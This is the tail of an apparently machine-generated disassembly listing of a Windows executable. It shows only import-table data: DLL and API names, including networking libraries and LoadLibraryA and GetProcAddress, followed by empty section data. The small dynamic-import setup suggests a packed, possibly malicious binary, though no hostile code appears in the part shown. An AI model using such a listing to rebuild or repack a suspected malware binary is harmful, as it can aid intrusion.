dd 0D110h, 0D0C8h, 3 dup(0)
dd 0D11Bh, 0D0D0h, 3 dup(0)
dd 0D127h, 0D0D8h, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C50290h, 0
aAs2t db 's2t',0
align 4
dd 7E42E002h, 0
aBB db 'B',0
align 4
aPlq db 'Pq',0
align 10h
aKernel32_dll db 'KERNEL32.DLL',0
aAdvapi32_dll db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
aOdbc32_dll db 'ODBC32.dll',0
aUser32_dll db 'USER32.dll',0
aWininet_dll db 'WININET.dll',0
aWs2_32_dll db 'WS2_32.dll',0
align 4
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddress db 'GetProcAddress',0
align 2
aExitprocess db 'ExitProcess',0
align 10h
aRegclosekey db 'RegCloseKey',0
dd 65630000h, 6C69h, 4D746547h, 61737365h, 416567h, 6E490000h
dd 6E726574h, 704F7465h, 416E65h, 39Ch dup(0)
rsrc ends
; Section 4. (virtual address 0000E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000E000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40E000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start